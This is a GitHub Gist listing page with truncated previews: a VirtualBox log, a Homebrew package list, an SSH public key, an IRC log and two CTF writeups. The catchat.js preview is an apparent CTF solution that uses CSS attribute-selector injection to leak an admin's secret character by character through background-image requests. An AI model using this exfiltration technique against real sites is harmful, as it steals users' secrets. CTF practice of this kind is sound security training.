Skip to content

Instantly share code, notes, and snippets.

View catchat.js
prefix = 'L0LC47S_43V3R'
grecaptcha.execute(recaptcha_id, {action: 'report'}).then((token) => send('/report ' + token));
setTimeout(() => {
fetch(`send?name=${encodeURIComponent('/secret wao;')}&msg=dog`)
}, 2000);
setTimeout(() => {
let payload = ''
for(let i = '0'.charCodeAt(0); i <= '9'.charCodeAt(0); ++i) {
let a = String.fromCharCode(i)
payload += `span[data-secret^=${prefix}${a}]{background:url(./send?name=a&msg=flag%20${a})}`
<iframe src=/profile.php?id=c7ab51c5bdeec6bc6068d8a643a29907a1b7c71acb455454381fe7320cd5283e id=msg csp="script-src 'unsafe-inline';">
View VBox.log
VirtualBox VM 5.2.10_Ubuntu r121806 linux.amd64 (Apr 26 2018 08:49:04) release log
00:00:00.267421 Log opened 2018-05-26T05:35:20.048575000Z
00:00:00.267422 Build Type: release
00:00:00.267424 OS Product: Linux
00:00:00.267425 OS Release: 4.15.0-22-generic
00:00:00.267425 OS Version: #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018
00:00:00.267439 DMI Product Name: System Product Name
00:00:00.267443 DMI Product Version: System Version
00:00:00.267471 Host RAM: 32165MB (31.4GB) total, 30320MB (29.6GB) available
00:00:00.267473 Executable: /usr/lib/virtualbox/VirtualBox
View backup
~ ᐅ brew cask list
adobe-acrobat-reader firefoxnightly gyazo mactex skype xquartz
adobe-air font-source-code-pro hex-fiend maltego slack zeplin
android-studio github-desktop intellij-idea-ce mendeley tex-live-utility zoomus
atom gnucash iterm2 minecraft vagrant
discord google-chrome java mysqlworkbench virtualbox
docker google-drive java8 night-owl vlc
dropbox google-japanese-ime jd-gui obs vysor
firefox google-nik-collection limechat skim wireshark
~ ᐅ brew list
View bingo.cgi
# -*- coding: utf-8 -*-
import os
import sys
import random
import json
import cgi
import cv2
tyage / K3
Last active Nov 12, 2017
Trend Micro CTF 2017 Finals - K3 writeup
View K3

Open help chat and wait until user list is shown.

Call to user and say “Anyaway, what is your favorite food?”.

You will get flag.

View irclog.html
<html class="normal" _type="channel" channelname="#cbctf-2017"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><meta http-equiv="Content-Style-Type" content="text/css"><style>html {font-family:'Courier';font-size:9pt;background-color:white;color:black;word-wrap:break-word;margin:0;padding:3px 4px 10px 4px;}body {margin:0;padding:0}img {border:1px solid #aaa;vertical-align:top;}object {vertical-align:top;}hr {margin:0.5em 2em;}.line {margin:0 -4px; padding:0 4px 1px 4px; clear:both;}.line[alternate=even] {}.line[alternate=odd] {}.line[_type=action] .sender:before {content: '• ';white-space: nowrap;}.inlineimage {margin: 10px 0 15px 40px;max-width: 200px;max-height: 150px;-webkit-box-shadow: 2px 2px 2px #888;}.avatar {display: inline;max-width: 24px;max-height: 24px;margin-right: 3px;vertical-align: middle;}.url { word-break: break-all; }.address { text-decoration: underline; word-break: break-all; }.highlight { color: #f0
View yoriko
ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBAFhYrEJV23heQWxoQYeNH7T0p3I0exYNicvqCf3UUHYysg9/PoaDyJTEb6gbEQ18EKR7LYClySJ0QQpVIZxsuleEwE+9vDkj6YD3BDO6/10PAElnAgHsBPOnO43XzV1nyokUE4MoHeC2p4nnJoHzCNw96dUgRYlTq67ZPsFE4iHP6Uheg== yoriko
You can’t perform that action at this time.